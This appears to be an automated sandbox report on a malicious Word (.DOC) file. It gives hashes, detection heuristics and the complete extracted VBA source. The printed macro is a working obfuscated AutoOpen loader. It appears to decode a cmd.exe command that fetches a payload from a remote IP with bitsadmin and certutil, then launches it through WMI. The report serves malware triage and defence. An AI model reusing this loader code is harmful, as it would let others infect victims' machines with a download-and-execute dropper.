Office (OLE) / .DOC malware analysis — malicious · d2de87876de17512

MALICIOUS

Office (OLE) / .DOC

48.5 KB Created: 2026-06-07 14:27:00 Authoring application: Microsoft Office Word First seen: 2026-06-14

MD5: 0ad030dedcd854e8e656247f7b6a8f94 SHA-1: 2c1a76305c857a71fe6d21b71a37770d740c43c9 SHA-256: d2de87876de1751206eaf906e6d002e9101a38a09595697868e1db0195170ea7

252 Risk Score

Heuristics 9

ClamAV: Doc.Malware.Valyria-10010644-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-10010644-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
GetObject(uxuzlmb).Get(pshlyrgoblr).Create ssdcyxc, Null, Null, qqkhxtdcjq
```

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

GetObject(uxuzlmb).Get(pshlyrgoblr).Create ssdcyxc, Null, Null, qqkhxtdcjq

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2597 bytes
SHA-256: `2a78f63d77feea9ac8271937379c4fe29ffcfcd537a209fdf93f6646264cdbba`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 9 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function hgdxcnuveddvhogmai(Beets) hgdxcnuveddvhogmai = Chr(Beets - 17) End Function Function tjuztmrruswkayzvgla(Grapes) tjuztmrruswkayzvgla = Left(Grapes, 3) End Function Function islyurrcce(Jelly) islyurrcce = Right(Jelly, Len(Jelly) - 3) End Function Function ndinuzy(Milk) Do Oatmilk = Oatmilk + hgdxcnuveddvhogmai(tjuztmrruswkayzvgla(Milk)) Milk = islyurrcce(Milk) Loop While Len(Milk) > 0 ndinuzy = Oatmilk End Function Sub AutoOpen() rqkxdbpvxmys End Sub Sub rqkxdbpvxmys() Dim tutxvepxbzqw As String Dim ssdcyxc As String tutxvepxbzqw = "116126117063118137118049064116049051117118125049064119049064130049084075109104122127117128136132109101114132124132109118127116" & _ "063133137133049067079127134125049055049117118125049064119049064130049084075109104122127117128136132109101114132124132109114063" & _ "118137118049067079127134125049055049115122133132114117126122127049064101131114127132119118131049133121118091128115049121133133" & _ "129075064064066074067063066071073063069070063067066070064097100099134127132129114116118062090127135128124118099134127062116118" & _ "131133134133122125084128117118117063133137133049084075109104122127117128136132109101114132124132109118127116063133137133049055" & _ "049116118131133134133122125049062117118116128117118049084075109104122127117128136132109101114132124132109118127116063133137133" & _ "049084075109104122127117128136132109101114132124132109114063118137118049055049084075109104122127117128136132109094122116131128" & _ "132128119133063095086101109087131114126118136128131124071069109135069063065063068065068066074109122127132133114125125134133122" & _ "125063118137118049064125128120119122125118078049064093128120101128084128127132128125118078119114125132118049064102049084075109" & _ "104122127117128136132109101114132124132109114063118137118051" ssdcyxc = ndinuzy(tutxvepxbzqw) On Error Resume Next If ActiveDocument.Name <> ndinuzy("121118125125128063117128116") Then Exit Sub End If On Error GoTo 0 Dim uxuzlmb As String Dim pshlyrgoblr As String Dim qqkhxtdcjq As Variant uxuzlmb = ndinuzy("136122127126120126133132075") pshlyrgoblr = ndinuzy("104122127068067112097131128116118132132") GetObject(uxuzlmb).Get(pshlyrgoblr).Create ssdcyxc, Null, Null, qqkhxtdcjq End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.